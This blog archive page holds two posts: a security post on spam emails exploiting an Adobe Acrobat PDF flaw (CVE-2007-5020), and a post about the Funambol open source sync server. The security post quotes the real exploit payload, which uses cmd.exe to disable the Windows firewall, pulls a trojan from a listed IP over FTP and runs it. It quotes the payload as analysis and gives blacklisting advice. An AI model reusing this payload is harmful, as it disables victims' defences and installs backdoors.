Archive for the 'integrity' Category

Oct 31

Massive exploitation of the PDF flaw by spam

in Confidentiality, In Internet, Internet, Security, Software, System and integrity. Comments Printable version Printable version

If you remember a few weeks ago I have written an post about a hole in adobe acrobat (CVE-2007-5020). It appears that the proof of concept is currently used to create a massive attack through spaming: you receive a mail with a pdf that contains the code to exploit the vulnerability. Since the vulnerability is not very old, I wonder how much serious it will became. Remember that Slammer or Code Red have used very old vulnerability (more that 6 month old). Thus many unpatched acroread are probably in the wild.

The current form of attack is used to install a backdoor. More specifically it does this ( SANS analysis):

obj<</URI(mailto :%/../../../../ ../../Windows /system32/cmd”.exe”” /c /q “@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&” “&”

In a more understable form (F-secure analysis) it means that the exploit disables the Windows Firewall by issuing the following command:

  • netsh firewall set opmode mode=DISABLE

Then it downloads the a file from the following FTP site and executes it:

  • ftp://203.121.69.116/[REMOVED].exe

Whish is Detected as Trojan-Downloader.Win32.Small.gkc. Currently, around of 32% of the common antivirus are able to detect it. Soon or later a new version that directly execute a shellcode or a wormcode will be in the wild and it will became very nasty because this time it will not be possible to block the backdoor download point with a firewall. In the mean time better safe than sorry: the IP 203.121.69.116 should be blacklisted in your firewall. Even if this box is not reachable anymore. Also remember that even if the backdoor is not installed this exploit still desactivate the XP firewall and therefore may introduce a subsequent problems.

Oct 19

Funambol: Free Open Source sync server for smartphone

in In Internet, Processing and storage, Software and integrity. Comments Printable version Printable version

Beside the obvious phone function, smartphone also allow you to carry your personnal data such as contact, meeting and so on. Of course you have to sync it with your computer for backup and replication. However when you seek to do it while traveling or what to have multiple deviced synced. Let’s say your office computer, your laptop and an web calendar. Things get tricky, Moreover if your office computer is like mine under Linux. The natural solution is to have a sync server. However until now, the two available options where not what I was looking for.

First using a third party service. Here confidentiality and availability are an issue for me. I me sorry but these files are to personnal, I dont trust third party here. Even my phone compagny Orange. Sorry guys.

The other option was to have an exchange server (my phone is a windows mobile) and I want to stick with this technology because it work like I want. I infact plan to have a tytn2 as next phone. This was not an option because if I have a server, the one used to host this blog in fact, it run a Linux and I am not going to change that either.

So until now I was pretty stuck, but I may have found my holy graal : an open source sync server. Take look at it here:

Funambol: Open Source sync server

It also support Iphone :) I really dont know how I have miss this software. Any way I will give it a try in the few next days, Anyone have already try it ?

« Older Entries